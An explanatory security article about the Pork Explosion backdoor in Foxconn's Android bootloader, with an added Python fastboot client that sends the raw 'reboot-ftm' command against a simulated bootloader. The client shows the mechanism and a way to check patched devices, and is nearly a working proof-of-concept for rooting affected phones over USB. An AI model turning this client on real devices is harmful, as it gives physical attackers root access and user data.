Android has been one of the most active targets for security research and real-world attacks over the past several years. Google continues to patch reported flaws, but a serious new vulnerability has now surfaced on a number of smartphones. This flaw bypasses several of the device's core security controls and leaves it open to a range of attacks.
The flaw was disclosed by security researcher Jon Sawyer, who goes by the pseudonym Justin Case, or more commonly jcase. The vulnerability, christened Pork Explosion, sits in the apps bootloader (aboot) supplied by hardware manufacturer Foxconn. The uncomfortable part is that the problem is not Android-specific: it appears to have been deliberately built into the bootloader by the hardware manufacturer, and the OEMs whose devices carry it were most likely unaware that the backdoor was there.
For background, Foxconn is one of the largest contract hardware manufacturers in the world and is best known for building iPhones for Apple. It also manufactures devices for a number of Android OEMs (LG, Sony and Samsung among them). Some of these OEMs allow Foxconn to build the low-level firmware for their devices, and that is where the problem lies.
jcase found that Foxconn's apps bootloader contains a backdoor that anyone with USB access can use to obtain a root shell on the Android device. With root privileges and the device's protections switched off, an attacker could use that access for forensic data extraction, for brute-forcing the user's credential to recover encryption keys, or for unlocking the bootloader without wiping user data, which is precisely what a bootloader unlock is supposed to force.
The root shell is obtained through the bootloader itself, so it helps to understand how fastboot commands work. They come in two kinds: normal and OEM. Normal commands such as reboot and getvar are hard-coded into the fastboot client and are sent over USB; OEM commands are non-standard commands implemented by the device manufacturer and are sent with the 'oem' prefix. The distinction matters here.
The command that caught jcase's attention, 'reboot-ftm', is neither. It cannot be sent with the 'oem' prefix, and the stock fastboot client has no way to send it as a normal command either, because the client only emits the commands it knows about. To reach it, one has to write a custom client that connects to the device over USB and sends the raw string 'reboot-ftm' to the bootloader.
That command tells the phone to reboot into factory test mode, which amounts to a full compromise over USB. In that mode the adb daemon runs as root and does not enforce adb authorization, so a connected computer the user has never approved gets a root shell without any prompt on the device. SELinux is not merely permissive in this state; it is disabled entirely.
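To make the three preceding paragraphs concrete, here is an added example of the kind of custom client they describe: it speaks the fastboot wire protocol directly, so it can put a bare 'reboot-ftm' on the wire where the stock fastboot binary cannot. This is not jcase's tool or any Foxconn code. The device side is a constructed simulation of a bootloader that either honours or rejects the command, so the exchange runs offline; on real hardware the `write`/`read` callbacks would be USB bulk transfers on the fastboot interface (for instance via pyusb, which is an assumption, not something the page shows). The list of stock fastboot verbs is a representative subset, also an assumption.

```python
"""Added example: a minimal fastboot host client that can send a command the stock
`fastboot` binary cannot. Not jcase's tool or Foxconn code; the device side is a
constructed simulation so the exchange runs offline."""

MAX_COMMAND_LEN = 64   # fastboot commands are NUL-free ASCII, at most 64 bytes
MAX_RESPONSE_LEN = 64  # device replies: 4-byte status + up to 60 bytes of text
STATUSES = ("OKAY", "FAIL", "INFO", "DATA")

# Representative subset of the verbs the stock fastboot client knows how to emit
# (assumption: the real list is longer, but 'reboot-ftm' is not on it).
STOCK_VERBS = {"getvar", "reboot", "reboot-bootloader", "continue", "flash",
               "erase", "boot", "download", "flashing", "oem"}


def stock_client_can_send(command: str) -> bool:
    """True if `fastboot` has a way to put this exact string on the wire.
    'oem <anything>' is sendable; an unlisted bare verb like 'reboot-ftm' is not."""
    verb = command.split(":", 1)[0].split(" ", 1)[0]
    return verb in STOCK_VERBS


def encode_command(command: str) -> bytes:
    data = command.encode("ascii")
    if b"\x00" in data or not data or len(data) > MAX_COMMAND_LEN:
        raise ValueError("fastboot command must be 1-64 bytes of NUL-free ASCII")
    return data


def parse_response(raw: bytes):
    """Split a device reply into (status, payload); reject malformed frames."""
    if not 4 <= len(raw) <= MAX_RESPONSE_LEN:
        raise ValueError("bad response length %d" % len(raw))
    status = raw[:4].decode("ascii", "replace")
    if status not in STATUSES:
        raise ValueError("unknown status %r" % status)
    return status, raw[4:].decode("ascii", "replace")


class FastbootClient:
    """Transport-agnostic client: `write`/`read` would be USB bulk transfers on a
    real device (assumption: e.g. via pyusb); here they are bound to the simulator."""

    def __init__(self, write, read):
        self._write, self._read = write, read

    def command(self, command: str):
        self._write(encode_command(command))
        infos = []
        while True:  # INFO lines may precede the terminal OKAY/FAIL/DATA
            status, payload = parse_response(self._read())
            if status == "INFO":
                infos.append(payload)
                continue
            return status, payload, infos


class SimulatedBootloader:
    """Constructed stand-in for an aboot image. accepts_ftm=True models the
    backdoored bootloader; False models one that rejects the command."""

    def __init__(self, accepts_ftm: bool):
        self.accepts_ftm = accepts_ftm
        self.mode = "fastboot"
        self._queue = []

    def write(self, data: bytes):
        cmd = data.decode("ascii")
        if cmd == "getvar:version":
            self._queue.append(b"OKAY0.5")
        elif cmd.startswith("oem "):
            self._queue.append(b"FAILunknown oem command")
        elif cmd == "reboot-ftm" and self.accepts_ftm:
            self.mode = "ftm"  # models: adbd as root, no auth, SELinux disabled
            self._queue += [b"INFOentering factory test mode", b"OKAY"]
        else:
            self._queue.append(b"FAILunknown command")

    def read(self) -> bytes:
        return self._queue.pop(0)


def probe_ftm(bootloader: SimulatedBootloader):
    """Send 'reboot-ftm' raw and report (status, resulting mode, INFO lines)."""
    client = FastbootClient(bootloader.write, bootloader.read)
    status, _payload, infos = client.command("reboot-ftm")
    return status, bootloader.mode, infos


if __name__ == "__main__":
    print("stock fastboot can send reboot-ftm:", stock_client_can_send("reboot-ftm"))
    for name, dev in (("vulnerable", SimulatedBootloader(True)),
                      ("fixed", SimulatedBootloader(False))):
        print(name, probe_ftm(dev))
```

The point the simulation makes is that nothing in the protocol stops an arbitrary string from reaching the bootloader's command parser; the only barrier is that the stock client never emits one it does not know. A fixed bootloader should answer `FAIL` to 'reboot-ftm' exactly as it does to any other unknown command, and a quick way to verify a patched device is to send the raw command and confirm the device stays in fastboot mode rather than rebooting.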
Two Foxconn-manufactured devices that jcase confirmed to be affected are the Nextbit Robin and an InFocus handset. He has reported the issue to the device makers and to Foxconn. Nextbit moved quickly to mitigate the vulnerability, while there has so far been no response from Foxconn itself.
jcase notes that although this may have started life as a Foxconn debugging feature, in shipped devices it functions as a backdoor for anyone with physical USB access. Foxconn, and the OEMs that ship its bootloader, should treat removing it as a priority.